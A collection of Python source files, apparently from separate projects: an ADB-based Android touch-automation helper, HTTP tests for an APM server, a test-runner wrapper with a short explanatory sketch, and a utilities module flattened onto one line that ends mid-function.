adb.py
import os
import time
from threading import Thread

from pyadb import Device, PyADB
from pyandroidtouch import common
from pyandroidtouch.py import PyAndroidTouch


class PyAndroidTouchADB(PyAndroidTouch):
    PATH_REMOTE = '/data/local/tmp/android_touch'

    def __init__(self, device: Device, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self._device = device
        abi = device.abi
        path_touch = common.get_module_res('libs/%s/android_touch' % abi)
        if os.path.exists(path_touch):
            self.print_debug('Pushing "android_touch".')
            if device.file.push(path_touch, remote=self.PATH_REMOTE):
                device.execute('chmod', '+x', self.PATH_REMOTE)
                f = device.forward
                port = None
                for p in range(50000, 65535):
                    if f.tcp(p, 8080):
                        port = p
                        break
                self.set_device(port=port)
                self.print_debug('Forward Port: %s' % port)
                self.print_debug('Current Forward Ports: ',
                                 *['\n\t%a' % i for i in f.list])
            else:
                raise Exception('Push File Failed!', device.adb.last_exec)
        else:
            raise FileNotFoundError('Unsupport ABI: %s.' % abi)
        self.print_debug('Waiting "android_touch" init.')
        self._t = Thread(target=self._t_init)
        self._t.start()
        while self.pid is None:
            time.sleep(0.1)
        self.print_debug('Init Success.')

    @property
    def pid(self):
        out = self._device.execute_out("ps|grep android_touch|awk '{ print $2 }'")
        if out != '':
            return int(out)
        else:
            return None

    def _t_init(self):
        self._device.execute("kill", '-9', self.pid)
        adb = self._device.adb.copy()
        adb.current_device.execute(self.PATH_REMOTE)

    def destroy(self):
        self._device.execute("kill", '-9', self.pid)
        self._device.file.delete(self.PATH_REMOTE)
        self._device.forward.remove('tcp:%s' % self._port)
        self.print_debug('Destroy Finish.')


if __name__ == '__main__':
    adb = PyADB()
    device = list(adb.devices.values())[0]
    pat = PyAndroidTouchADB(device, debug=True)
    pat.tap(640, 360, finger=2, finger_degree=45)
    pat.tap(100, 200).wait(500).tap(200, 300).execute()
    pat.destroy()
test_requests.py
from nose.tools import raises
from apmserver import ServerBaseTest, SecureServerBaseTest, ClientSideBaseTest, CorsBaseTest
from requests.exceptions import SSLError
import requests
import json
import zlib
import gzip
import time
from datetime import datetime
from collections import defaultdict
import threading

try:
    from StringIO import StringIO
except ImportError:
    import io


class Test(ServerBaseTest):

    def test_ok(self):
        transactions = self.get_transaction_payload()
        r = requests.post(self.transactions_url, json=transactions)
        assert r.status_code == 202, r.status_code

    def test_empty(self):
        transactions = {}
        r = requests.post(self.transactions_url, json=transactions)
        assert r.status_code == 400, r.status_code

    def test_not_existent(self):
        transactions = {}
        invalid_url = 'http://localhost:8200/transactionX'
        r = requests.post(invalid_url, json=transactions)
        assert r.status_code == 404, r.status_code

    def test_method_not_allowed(self):
        r = requests.get(self.transactions_url)
        assert r.status_code == 405, r.status_code

    def test_bad_json(self):
        r = requests.post(self.transactions_url, json="not json")
        assert r.status_code == 400, r.status_code

    def test_validation_fail(self):
        transactions = self.get_transaction_payload()
        # month and day swapped
        transactions["transactions"][0]["timestamp"] = "2017-30-05T18:53:27.154Z"
        r = requests.post(self.transactions_url, json=transactions)
        assert r.status_code == 400, r.status_code
        assert "Problem validating JSON document against schema" in r.content, r.content

    def test_validation_2_fail(self):
        transactions = self.get_transaction_payload()
        # timezone offsets not allowed
        transactions["transactions"][0]["timestamp"] = "2017-05-30T18:53:27.154+00:20"
        r = requests.post(self.transactions_url, json=transactions)
        assert r.status_code == 400, r.status_code
        assert "Problem validating JSON document against schema" in r.content, r.content

    def test_frontend_default_disabled(self):
        transactions = self.get_transaction_payload()
        r = requests.post(
            'http://localhost:8200/v1/client-side/transactions', json=transactions)
        assert r.status_code == 403, r.status_code

    def test_healthcheck(self):
        healtcheck_url = 'http://localhost:8200/healthcheck'
        r = requests.get(healtcheck_url)
        assert r.status_code == 200, r.status_code

    def test_gzip(self):
        transactions = json.dumps(self.get_transaction_payload())
        try:
            out = StringIO()
        except:
            out = io.BytesIO()
        with gzip.GzipFile(fileobj=out, mode="w") as f:
            try:
                f.write(transactions)
            except:
                f.write(bytes(transactions, 'utf-8'))
        r = requests.post(self.transactions_url, data=out.getvalue(),
                          headers={'Content-Encoding': 'gzip', 'Content-Type': 'application/json'})
        assert r.status_code == 202, r.status_code

    def test_deflate(self):
        transactions = json.dumps(self.get_transaction_payload())
        try:
            compressed_data = zlib.compress(transactions)
        except:
            compressed_data = zlib.compress(bytes(transactions, 'utf-8'))
        r = requests.post(self.transactions_url, data=compressed_data,
                          headers={'Content-Encoding': 'deflate', 'Content-Type': 'application/json'})
        assert r.status_code == 202, r.status_code

    def test_gzip_error(self):
        data = self.get_transaction_payload()
        r = requests.post(self.transactions_url, json=data,
                          headers={'Content-Encoding': 'gzip', 'Content-Type': 'application/json'})
        assert r.status_code == 400, r.status_code

    def test_deflate_error(self):
        data = self.get_transaction_payload()
        r = requests.post(self.transactions_url, data=data,
                          headers={'Content-Encoding': 'deflate', 'Content-Type': 'application/json'})
        assert r.status_code == 400, r.status_code

    def test_expvar_default(self):
        """expvar should not be exposed by default"""
        r = requests.get(self.expvar_url)
        assert r.status_code == 404, r.status_code


class SecureTest(SecureServerBaseTest):

    def test_https_ok(self):
        transactions = self.get_transaction_payload()
        r = requests.post("https://localhost:8200/v1/transactions",
                          json=transactions, verify=False)
        assert r.status_code == 202, r.status_code

    @raises(SSLError)
    def test_https_verify(self):
        transactions = self.get_transaction_payload()
        requests.post("https://localhost:8200/v1/transactions",
                      json=transactions)


class ClientSideTest(ClientSideBaseTest):

    def test_ok(self):
        transactions = self.get_transaction_payload()
        r = requests.post(self.transactions_url, json=transactions)
        assert r.status_code == 202, r.status_code

    def test_error_ok(self):
        errors = self.get_error_payload()
        r = requests.post(self.errors_url, json=errors)
        assert r.status_code == 202, r.status_code

    def test_sourcemap_upload(self):
        r = self.upload_sourcemap(file_name='bundle.js.map')
        assert r.status_code == 202, r.status_code

    def test_sourcemap_upload_fail(self):
        import os
        path = os.path.abspath(os.path.join(self.beat_path,
                                            'tests', 'data', 'valid',
                                            'sourcemap', 'bundle.js.map'))
        file = open(path)
        r = requests.post(self.sourcemap_url, files={'sourcemap': file})
        assert r.status_code == 400, r.status_code


class CorsTest(CorsBaseTest):

    def test_ok(self):
        transactions = self.get_transaction_payload()
        r = requests.post(self.transactions_url, json=transactions,
                          headers={'Origin': 'http://www.elastic.co'})
        assert r.headers['Access-Control-Allow-Origin'] == 'http://www.elastic.co', r.headers
        assert r.status_code == 202, r.status_code

    def test_bad_origin(self):
        # origin must include protocol and match exactly the allowed origin
        transactions = self.get_transaction_payload()
        r = requests.post(self.transactions_url, json=transactions,
                          headers={'Origin': 'www.elastic.co'})
        assert r.status_code == 403, r.status_code

    def test_no_origin(self):
        transactions = self.get_transaction_payload()
        r = requests.post(self.transactions_url, json=transactions)
        assert r.status_code == 403, r.status_code

    def test_preflight(self):
        transactions = self.get_transaction_payload()
        r = requests.options(self.transactions_url,
                             json=transactions,
                             headers={'Origin': 'http://www.elastic.co',
                                      'Access-Control-Request-Method': 'POST',
                                      'Access-Control-Request-Headers': 'Content-Type, Content-Encoding'})
        assert r.status_code == 200, r.status_code
        assert r.headers['Access-Control-Allow-Origin'] == 'http://www.elastic.co', r.headers
        assert r.headers['Access-Control-Allow-Headers'] == 'Content-Type, Content-Encoding, Accept', r.headers
        assert r.headers['Access-Control-Allow-Methods'] == 'POST, OPTIONS', r.headers
        assert r.headers['Vary'] == 'Origin', r.headers
        assert r.headers['Content-Length'] == '0', r.headers
        assert r.headers['Access-Control-Max-Age'] == '3600', r.headers

    def test_preflight_bad_headers(self):
        transactions = self.get_transaction_payload()
        for h in [{'Access-Control-Request-Method': 'POST'}, {'Origin': 'www.elastic.co'}]:
            r = requests.options(self.transactions_url, json=transactions, headers=h)
            assert r.status_code == 200, r.status_code
            assert 'Access-Control-Allow-Origin' not in r.headers.keys(), r.headers
            assert r.headers['Access-Control-Allow-Headers'] == 'Content-Type, Content-Encoding, Accept', r.headers
            assert r.headers['Access-Control-Allow-Methods'] == 'POST, OPTIONS', r.headers


class RateLimitTest(ClientSideBaseTest):

    def test_rate_limit(self):
        transactions = self.get_transaction_payload()
        threads = []
        codes = defaultdict(int)

        def fire():
            r = requests.post(self.transactions_url, json=transactions)
            codes[r.status_code] += 1
            return r.status_code

        for _ in range(10):
            threads.append(threading.Thread(target=fire))
        for t in threads:
            t.start()
        for t in threads:
            t.join()
        assert set(codes.keys()) == set([202, 429]), codes
        assert codes[429] == 4, codes  # considering burst
        time.sleep(1)
        assert fire() == 202

    def test_rate_limit_multiple_ips(self):
        transactions = self.get_transaction_payload()
        threads = []
        codes = defaultdict(int)

        def fire(x):
            ip = '10.11.12.13' if x % 2 else '10.11.12.14'
            r = requests.post(self.transactions_url, json=transactions,
                              headers={'X-Forwarded-For': ip})
            codes[r.status_code] += 1
            return r.status_code

        for x in range(14):
            threads.append(threading.Thread(target=fire, args=(x,)))
        for t in threads:
            t.start()
        for t in threads:
            t.join()
        assert set(codes.keys()) == set([202, 429]), codes
        # considering burst: 1 "too many requests" per ip
        assert codes[429] == 2, codes
        time.sleep(1)
        assert fire(0) == 202
        assert fire(1) == 202
runner.py
import json
import subprocess
import sys
from threading import Thread
try:
    from Queue import Queue, Empty
except ImportError:
    from queue import Queue, Empty  # python 3.x

from events import EventSource
from model import TestMethod
import pipes


def enqueue_output(out, queue):
    """A utility method for consuming piped output from a subprocess.

    Reads content from `out` one line at a time, and puts it onto
    queue for consumption in a separate thread.
    """
    for line in iter(out.readline, b''):
        queue.put(line.strip().decode('utf-8'))
    out.close()


def parse_status_and_error(post):
    if post['status'] == 'OK':
        status = TestMethod.STATUS_PASS
        error = None
    elif post['status'] == 's':
        status = TestMethod.STATUS_SKIP
        error = 'Skipped: ' + post.get('error')
    elif post['status'] == 'F':
        status = TestMethod.STATUS_FAIL
        error = post.get('error')
    elif post['status'] == 'x':
        status = TestMethod.STATUS_EXPECTED_FAIL
        error = post.get('error')
    elif post['status'] == 'u':
        status = TestMethod.STATUS_UNEXPECTED_SUCCESS
        error = None
    elif post['status'] == 'E':
        status = TestMethod.STATUS_ERROR
        error = post.get('error')

    return status, error


class Runner(EventSource):
    "A wrapper around the subprocess that executes tests."

    def __init__(self, project, count, labels, testdir):
        self.project = project

        self.proc = subprocess.Popen(
            self.project.execute_commandline(labels, testdir),
            stdin=None,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            shell=False,
            bufsize=1,
            close_fds='posix' in sys.builtin_module_names
        )

        # Piped stdout/stderr reads are blocking; therefore, we need to
        # do all our readline calls in a background thread, and use a
        # queue object to store lines that have been read.
        self.stdout = Queue()
        t = Thread(target=enqueue_output, args=(self.proc.stdout, self.stdout))
        t.daemon = True
        t.start()

        self.stderr = Queue()
        t = Thread(target=enqueue_output, args=(self.proc.stderr, self.stderr))
        t.daemon = True
        t.start()

        # The TestMethod object currently under execution.
        self.current_test = None

        # An accumulator of output from the tests. If buffer is None,
        # then the test suite isn't currently running - it's in suite
        # setup/teardown.
        self.buffer = None

        # An accumulator for error output from the tests.
        self.error_buffer = []

        # The timestamp when current_test started
        self.start_time = None

        # The total count of tests under execution
        self.total_count = count

        # The count of tests that have been executed.
        self.completed_count = 0

        # The count of specific test results.
        self.result_count = {}

    @property
    def is_running(self):
        "Return True if this runner currently running."
        return self.proc.poll() is None

    @property
    def any_failed(self):
        return sum(self.result_count.get(state, 0) for state in TestMethod.FAILING_STATES)

    def terminate(self):
        "Stop the executor."
        self.proc.terminate()

    def poll(self):
        "Poll the runner looking for new test output"
        stopped = False
        finished = False

        # Read from stdout, building a buffer.
        lines = []
        try:
            while True:
                lines.append(self.stdout.get(block=False))
        except Empty:
            # queue.get() raises an exception when the queue is empty.
            # This means there is no more output to consume at this time.
            pass

        # Read from stderr, building a buffer.
        try:
            while True:
                self.error_buffer.append(self.stderr.get(block=False))
        except Empty:
            # queue.get() raises an exception when the queue is empty.
            # This means there is no more output to consume at this time.
            pass

        # Check to see if the subprocess is still running.
        # If it isn't, raise an error.
        if self.proc is None:
            stopped = True
        elif self.proc.poll() is not None:
            stopped = True

        # Process all the full lines that are available
        for line in lines:
            # Look for a separator.
            if line in (pipes.PipedTestResult.RESULT_SEPARATOR,
                        pipes.PipedTestRunner.START_TEST_RESULTS,
                        pipes.PipedTestRunner.END_TEST_RESULTS):
                if self.buffer is None:
                    # Preamble is finished. Set up the line buffer.
                    self.buffer = []
                else:
                    # Start of new test result; record the last result
                    # Then, work out what content goes where.
                    pre = json.loads(self.buffer[0])
                    if len(self.buffer) == 2:
                        # No subtests are present, or only one subtest
                        post = json.loads(self.buffer[1])
                        status, error = parse_status_and_error(post)
                    else:
                        # We have subtests; capture the most important status
                        # (until we can capture all the statuses)
                        status = TestMethod.STATUS_PASS  # Assume pass until told otherwise
                        error = ''
                        for line_num in range(1, len(self.buffer)):
                            post = json.loads(self.buffer[line_num])
                            subtest_status, subtest_error = parse_status_and_error(post)
                            if subtest_status > status:
                                status = subtest_status
                            if subtest_error:
                                error += subtest_error + '\n\n'

                    # Increase the count of executed tests
                    self.completed_count = self.completed_count + 1

                    # Get the start and end times for the test
                    start_time = float(pre['start_time'])
                    end_time = float(post['end_time'])

                    self.current_test.description = post['description']

                    self.current_test.set_result(
                        status=status,
                        output=post.get('output'),
                        error=error,
                        duration=end_time - start_time,
                    )

                    # Work out how long the suite has left to run (approximately)
                    if self.start_time is None:
                        self.start_time = start_time
                    total_duration = end_time - self.start_time
                    time_per_test = total_duration / self.completed_count
                    remaining_time = (self.total_count - self.completed_count) * time_per_test
                    if remaining_time > 4800:
                        remaining = '%s hours' % int(remaining_time / 2400)
                    elif remaining_time > 2400:
                        remaining = '%s hour' % int(remaining_time / 2400)
                    elif remaining_time > 120:
                        remaining = '%s mins' % int(remaining_time / 60)
                    elif remaining_time > 60:
                        remaining = '%s min' % int(remaining_time / 60)
                    else:
                        remaining = '%ss' % int(remaining_time)

                    # Update test result counts
                    self.result_count.setdefault(status, 0)
                    self.result_count[status] = self.result_count[status] + 1

                    # Notify the display to update.
                    self.emit('test_end', test_path=self.current_test.path,
                              result=status, remaining_time=remaining)

                    # Clear the decks for the next test.
                    self.current_test = None
                    self.buffer = []

                    if line == pipes.PipedTestRunner.END_TEST_RESULTS:
                        # End of test execution.
                        # Mark the runner as finished, and move back
                        # to a pre-test state in the results.
                        finished = True
                        self.buffer = None
            else:
                # Not a separator line, so it's actual content.
                if self.buffer is None:
                    # Suite isn't running yet - just display the output
                    # as a status update line.
                    self.emit('test_status_update', update=line)
                else:
                    # Suite is running - have we got an active test?
                    # Doctest (and some other tools) output invisible escape sequences.
                    # Strip these if they exist.
                    if line.startswith('\x1b'):
                        line = line[line.find('{'):]

                    # Store the cleaned buffer
                    self.buffer.append(line)

                    # If we don't have a currently active test, this line will
                    # contain the path for the test.
                    if self.current_test is None:
                        try:
                            # No active test; first line tells us which test is running.
                            pre = json.loads(line)
                        except ValueError:
                            self.emit('suit_end')
                            return True
                        self.current_test = self.project.confirm_exists(pre['path'])
                        self.emit('test_start', test_path=pre['path'])

        # If we're not finished, requeue the event.
        if finished:
            if self.error_buffer:
                self.emit('suite_end', error='\n'.join(self.error_buffer))
            else:
                self.emit('suite_end')
            return False
        elif stopped:
            # Suite has stopped producing output.
            if self.error_buffer:
                self.emit('suite_error', error='\n'.join(self.error_buffer))
            else:
                self.emit('suite_error', error='Test output ended unexpectedly')
            # Suite has finished; don't requeue
            return False
        else:
            # Still running - requeue event.
            return True


import argparse
import unittest


class PyTestExecutor(object):
    '''
    This is a thing which, when run, produces a stream of well-formed
    test result outputs. Its processing is initiated by the top-level
    Runner class
    '''

    def __init__(self):
        # Allows the executor to run a specified list of tests
        self.specified_list = None

    def flatten_results(self, iterable):
        input = list(iterable)
        while input:
            item = input.pop(0)
            try:
                data = iter(item)
                input = list(data) + input
            except:
                yield item

    def run_only(self, specified_list):
        self.specified_list = specified_list

    def stream_suite(self, suite):
        print("Calling stream_suite: " + str(suite))
        pipes.PipedTestRunner().run(suite)

    def stream_results(self, testdir=None):
        if testdir is None:
            testdir = '.'
        loader = unittest.TestLoader()
        tests = loader.discover(testdir)
        flat_tests = list(self.flatten_results(tests))

        if not self.specified_list:
            suite = loader.discover(testdir)
            self.stream_suite(suite)
        else:
            suite = unittest.TestSuite()

            # Add individual test cases.
            for test in flat_tests:
                if test.id() in self.specified_list:
                    suite.addTest(test)

            # Add all tests in a file.
            for specified in self.specified_list:
                if specified.count('.') == 0:
                    for test in flat_tests:
                        module_name = test.id()[0:test.id().index('.')]
                        if specified == module_name:
                            suite.addTest(test)

            # Add all tests in a class within a file.
            for specified in self.specified_list:
                if specified.count('.') == 1:
                    for test in flat_tests:
                        module_name = test.id()[0:test.id().rindex('.')]
                        if specified == module_name:
                            suite.addTest(test)

            self.stream_suite(suite)


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--testdir', dest='testdir', default='.',
                        help='Directory to choose tests from')
    parser.add_argument('labels', nargs=argparse.REMAINDER,
                        help='Test labels to run.')
    options = parser.parse_args()
    executor = PyTestExecutor()

    # options.labels = list()
    # options.labels.append('test_acquire.TestAcquire.test_print_1')

    if options.labels is not None:
        print('Labels: ', options.labels)
    if options.labels:
        executor.run_only(options.labels)
    executor.stream_results(options.testdir)
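
The non-blocking read pattern that Runner.poll() relies on above (a daemon thread feeding a Queue from a blocking pipe, drained with get(block=False)) can be demonstrated standalone. The following is a minimal sketch, independent of cricket's Runner and TestMethod classes; the echoed child command is an arbitrary example.

# Minimal sketch of the background-reader pattern used by Runner above:
# a daemon thread feeds a Queue so the main thread can poll without blocking.
import subprocess
import sys
from threading import Thread
from queue import Queue, Empty


def enqueue_output(out, queue):
    for line in iter(out.readline, b''):
        queue.put(line.strip().decode('utf-8'))
    out.close()


proc = subprocess.Popen([sys.executable, '-c', 'print("hello")'],
                        stdout=subprocess.PIPE)
q = Queue()
t = Thread(target=enqueue_output, args=(proc.stdout, q))
t.daemon = True
t.start()

proc.wait()        # child exits; reader thread drains the pipe and closes it
t.join(timeout=1)
try:
    while True:
        print('got:', q.get(block=False))  # drain everything read so far
except Empty:
    pass                                   # queue exhausted; nothing blocks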
util.py
# Licensed under a 3-clause BSD style license - see LICENSE.rst """ Various low-level utilities. """ import datetime import json import math import os import re import select import signal import subprocess import sys import time import errno import threading import shutil import stat import shlex import operator import collections import multiprocessing from .extern import minify_json WIN = (os.name == 'nt') if not WIN: from select import PIPE_BUF TIMEOUT_RETCODE = -256 terminal_width = shutil.get_terminal_size().columns class UserError(Exception): pass class ParallelFailure(Exception): """ Custom exception to work around a multiprocessing bug https://bugs.python.org/issue9400 """ def __new__(cls, message, exc_cls, traceback_str): self = Exception.__new__(cls) self.message = message self.exc_cls = exc_cls self.traceback_str = traceback_str return self def __reduce__(self): return (ParallelFailure, (self.message, self.exc_cls, self.traceback_str)) def __str__(self): return "{0}: {1}\n {2}".format(self.exc_cls.__name__, self.message, self.traceback_str.replace("\n", "\n ")) def reraise(self): if self.exc_cls is UserError: raise UserError(self.message) else: raise self def human_list(input_list): """ Formats a list of strings in a human-friendly way. """ input_list = ["'{0}'".format(x) for x in input_list] if len(input_list) == 0: return 'nothing' elif len(input_list) == 1: return input_list[0] elif len(input_list) == 2: return ' and '.join(input_list) else: return ', '.join(input_list[:-1]) + ' and ' + input_list[-1] def human_float(value, significant=3, truncate_small=None, significant_zeros=False): """ Return a string representing a float with human friendly significant digits. Switches to scientific notation for too large/small numbers. If `truncate_small`, then leading zeros of numbers < 1 are counted as significant. If not `significant_zeros`, trailing unnecessary zeros are stripped. """ if value == 0: return "0" elif math.isinf(value) or math.isnan(value): return "{}".format(value) elif value < 0: sign = "-" value = -value else: sign = "" logv = math.log10(value) magnitude = int(math.floor(logv)) + 1 if truncate_small is not None: magnitude = max(magnitude, -truncate_small + 1) num_digits = significant - magnitude if magnitude <= -5 or magnitude >= 9: # Too many digits, use scientific notation fmt = "{{0:.{0}e}}".format(significant) elif value == int(value): value = int(round(value, num_digits)) fmt = "{0:d}" elif num_digits <= 0: value = int(round(value, num_digits)) fmt = "{0:d}" else: fmt = "{{0:.{0}f}}".format(num_digits) formatted = sign + fmt.format(value) if not significant_zeros and '.' in formatted and 'e' not in fmt: formatted = formatted.rstrip('0') if formatted[-1] == '.': formatted = formatted[:-1] if significant_zeros and '.' not in formatted: if len(formatted) < significant: formatted += "." + "0" * (significant - len(formatted)) return formatted def human_file_size(size, err=None): """ Returns a human-friendly string representing a file size that is 2-4 characters long. For example, depending on the number of bytes given, can be one of:: 256b 64k 1.1G Parameters ---------- size : int The size of the file (in bytes) Returns ------- size : str A human-friendly representation of the size of the file """ size = float(size) if size < 1: size = 0.0 suffixes = ' kMGTPEH' if size == 0: num_scale = 0 else: num_scale = int(math.floor(math.log(size) / math.log(1000))) if num_scale > 7: suffix = '?' 
else: suffix = suffixes[num_scale].strip() scale = int(math.pow(1000, num_scale)) value = size / scale str_value = human_float(value, 3) if err is None: return "{0:s}{1}".format(str_value, suffix) else: str_err = human_float(err / scale, 1, truncate_small=2) return "{0:s}±{1:s}{2}".format(str_value, str_err, suffix) _human_time_units = ( ('ns', 0.000000001), ('μs', 0.000001), ('ms', 0.001), ('s', 1), ('m', 60), ('h', 60 * 60), ('d', 60 * 60 * 24), ('w', 60 * 60 * 24 * 7), ('y', 60 * 60 * 24 * 7 * 52), ('C', 60 * 60 * 24 * 7 * 52 * 100) ) def human_time(seconds, err=None): """ Returns a human-friendly time string that is always exactly 6 characters long. Depending on the number of seconds given, can be one of:: 1w 3d 2d 4h 1h 5m 1m 4s 15s Will be in color if console coloring is turned on. Parameters ---------- seconds : int The number of seconds to represent Returns ------- time : str A human-friendly representation of the given number of seconds that is always exactly 6 characters. """ units = _human_time_units seconds = float(seconds) scale = seconds if scale == 0 and err is not None: scale = float(err) if scale == 0: # Represent zero in reasonable units units = [('s', 1), ('m', 60)] if scale != scale: # nan return "n/a" for i in range(len(units) - 1): if scale < units[i + 1][1]: str_time = human_float(seconds / units[i][1], 3, significant_zeros=True) if err is None: return "{0:s}{1}".format(str_time, units[i][0]) else: str_err = human_float(err / units[i][1], 1, truncate_small=2) return "{0:s}±{1:s}{2}".format(str_time, str_err, units[i][0]) return '~0' def human_value(value, unit, err=None): """ Formats a value in a given unit in a human friendly way. Parameters ---------- value : anything The value to format unit : str The unit the value is in. Currently understands `seconds` and `bytes`. err : float, optional Std. error in the value """ if isinstance(value, (int, float)): if value != value: # nan display = "n/a" elif unit == 'seconds': display = human_time(value, err=err) elif unit == 'bytes': display = human_file_size(value, err=err) else: display = json.dumps(value) if err is not None: display += "±{:.2g}".format(err) elif value is None: display = "failed" else: display = json.dumps(value) return display def parse_human_time(string, base_period='d'): """ Parse a human-specified time period to an integer number of seconds. The following format is accepted: <number><suffix> Raises a ValueError on parse error. """ units = dict(_human_time_units) units[''] = units[base_period] suffixes = '|'.join(units.keys()) try: m = re.match(r'^\s*([0-9.]+)\s*({})\s*$'.format(suffixes), string) if m is None: raise ValueError() return float(m.group(1)) * units[m.group(2)] except ValueError: raise ValueError("%r is not a valid time period (valid units: %s)" % (string, suffixes)) def which(filename, paths=None): """ Emulates the UNIX `which` command in Python. Raises an IOError if no result is found. 
""" # Hide traceback from expected exceptions in pytest reports __tracebackhide__ = operator.methodcaller('errisinstance', IOError) if os.path.sep in filename: locations = [''] elif paths is not None: locations = paths else: locations = os.environ.get("PATH", "").split(os.pathsep) if WIN: # On windows, an entry in %PATH% may be quoted locations = [path[1:-1] if len(path) > 2 and path[0] == path[-1] == '"' else path for path in locations] if WIN: filenames = [filename + ext for ext in ('.exe', '.bat', '.com', '')] else: filenames = [filename] candidates = [] for location in locations: for filename in filenames: candidate = os.path.join(location, filename) if os.path.isfile(candidate) or os.path.islink(candidate): candidates.append(candidate) if len(candidates) == 0: if paths is None: loc_info = 'PATH' else: loc_info = os.pathsep.join(locations) raise IOError("Could not find '{0}' in {1}".format(filename, loc_info)) return candidates[0] def has_command(filename): """ Returns `True` if the commandline utility exists. """ try: which(filename) except IOError: return False else: return True class ProcessError(subprocess.CalledProcessError): def __init__(self, args, retcode, stdout, stderr): self.args = args self.retcode = retcode self.stdout = stdout self.stderr = stderr def __str__(self): if self.retcode == TIMEOUT_RETCODE: return "Command '{0}' timed out".format( ' '.join(self.args)) else: return "Command '{0}' returned non-zero exit status {1}".format( ' '.join(self.args), self.retcode) def check_call(args, valid_return_codes=(0,), timeout=600, dots=True, display_error=True, shell=False, env=None, cwd=None): """ Runs the given command in a subprocess, raising ProcessError if it fails. See `check_output` for parameters. """ # Hide traceback from expected exceptions in pytest reports __tracebackhide__ = operator.methodcaller('errisinstance', ProcessError) check_output( args, valid_return_codes=valid_return_codes, timeout=timeout, dots=dots, display_error=display_error, shell=shell, env=env, cwd=cwd) class DebugLogBuffer: def __init__(self, log): self.buf = [] self.first = True self.linebreak_re = re.compile(b'.*\n') self.log = log self.lock = threading.Lock() def __call__(self, c): with self.lock: self._process(c) def _process(self, c): if c is None: text = b"".join(self.buf) del self.buf[:] elif b'\n' in c: m = self.linebreak_re.match(c) j = m.end() self.buf.append(c[:j]) text = b"".join(self.buf) self.buf[:] = [c[j:]] else: self.buf.append(c) return text = text.decode('utf-8', 'replace') if text.endswith('\n'): text = text[:-1] if text: if self.first: self.log.debug('OUTPUT -------->', continued=True) self.first = False self.log.debug(text, continued=True) def check_output(args, valid_return_codes=(0,), timeout=600, dots=True, display_error=True, shell=False, return_stderr=False, env=None, cwd=None, redirect_stderr=False, return_popen=False): """ Runs the given command in a subprocess, raising ProcessError if it fails. Returns stdout as a string on success. Parameters ---------- valid_return_codes : list, optional A list of return codes to ignore. Defaults to only ignoring zero. Setting to None ignores all return codes. timeout : number, optional Kill the process if it does not produce any output in `timeout` seconds. If `None`, there is no timeout. Default: 10 min dots : bool, optional If `True` (default) write a dot to the console to show progress as the subprocess outputs content. May also be a callback function to call (with no arguments) to indicate progress. 
display_error : bool, optional If `True` (default) display the stdout and stderr of the subprocess when the subprocess returns an error code. shell : bool, optional If `True`, run the command through the shell. Default is `False`. return_stderr : bool, optional If `True`, return both the (stdout, stderr, errcode) as a tuple. env : dict, optional Specify environment variables for the subprocess. cwd : str, optional Specify the current working directory to use when running the process. redirect_stderr : bool, optional Whether to redirect stderr to stdout. In this case the returned ``stderr`` (when return_stderr == True) is an empty string. return_popen : bool, optional Whether to return immediately after subprocess.Popen. Returns ------- stdout, stderr, retcode : when return_stderr == True stdout : otherwise """ from .console import log # Hide traceback from expected exceptions in pytest reports __tracebackhide__ = operator.methodcaller('errisinstance', ProcessError) def get_content(header=None): content = [] if header is not None: content.append(header) if redirect_stderr: content.extend([ 'OUTPUT -------->', stdout[:-1] ]) else: content.extend([ 'STDOUT -------->', stdout[:-1], 'STDERR -------->', stderr[:-1] ]) return '\n'.join(content) if isinstance(args, str): args = [args] log.debug("Running '{0}'".format(' '.join(args))) kwargs = dict(shell=shell, env=env, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if redirect_stderr: kwargs['stderr'] = subprocess.STDOUT if WIN: kwargs['close_fds'] = False kwargs['creationflags'] = subprocess.CREATE_NEW_PROCESS_GROUP else: kwargs['close_fds'] = True posix = getattr(os, 'setpgid', None) if posix: # Run the subprocess in a separate process group, so that we # can kill it and all child processes it spawns e.g. on # timeouts. Note that subprocess.Popen will wait until exec() # before returning in parent process, so there is no race # condition in setting the process group vs. 
calls to os.killpg kwargs['preexec_fn'] = lambda: os.setpgid(0, 0) proc = subprocess.Popen(args, **kwargs) if return_popen: return proc last_dot_time = time.time() stdout_chunks = [] stderr_chunks = [] is_timeout = False if log.is_debug_enabled(): debug_log = DebugLogBuffer(log) dots = False else: def debug_log(c): return None if WIN: start_time = [time.time()] dot_start_time = start_time[0] is_timeout = False def stream_reader(stream, buf): try: while not is_timeout: c = stream.read(1) if not c: break start_time[0] = time.time() buf.append(c) debug_log(c) finally: stream.close() stdout_reader = threading.Thread(target=stream_reader, args=(proc.stdout, stdout_chunks)) stdout_reader.daemon = True stdout_reader.start() all_threads = [stdout_reader] if not redirect_stderr: stderr_reader = threading.Thread(target=stream_reader, args=(proc.stderr, stderr_chunks)) stderr_reader.daemon = True stderr_reader.start() all_threads.append(stderr_reader) # Wait for reader threads threads = list(all_threads) while threads: thread = threads[0] if timeout is None: remaining = None else: remaining = timeout - (time.time() - start_time[0]) if remaining <= 0: # Timeout; we won't wait for the thread to join here if not is_timeout: is_timeout = True proc.send_signal(signal.CTRL_BREAK_EVENT) threads.pop(0) continue if dots: dot_remaining = 0.5 - (time.time() - last_dot_time) if dot_remaining <= 0: # Print a dot only if there has been output if dot_start_time != start_time[0]: if dots is True: log.dot() elif dots: dots() dot_start_time = start_time[0] last_dot_time = time.time() dot_remaining = 0.5 if remaining is None: remaining = dot_remaining else: remaining = min(dot_remaining, remaining) thread.join(remaining) if not thread.is_alive(): threads.pop(0) if is_timeout: proc.terminate() # Wait a bit for the reader threads, if they're alive for thread in all_threads: thread.join(0.1) # Wait for process to exit proc.wait() else: try: if posix and is_main_thread(): # Forward signals related to Ctrl-Z handling; the child # process is in a separate process group so it won't receive # these automatically from the terminal def sig_forward(signum, frame): _killpg_safe(proc.pid, signum) if signum == signal.SIGTSTP: os.kill(os.getpid(), signal.SIGSTOP) signal.signal(signal.SIGTSTP, sig_forward) signal.signal(signal.SIGCONT, sig_forward) fds = {proc.stdout.fileno(): stdout_chunks} if not redirect_stderr: fds[proc.stderr.fileno()] = stderr_chunks while proc.poll() is None: try: if timeout is None: rlist, wlist, xlist = select.select( list(fds.keys()), [], []) else: rlist, wlist, xlist = select.select( list(fds.keys()), [], [], timeout) except select.error as err: if err.args[0] == errno.EINTR: # interrupted by signal handler; try again continue raise if len(rlist) == 0: # We got a timeout is_timeout = True break for f in 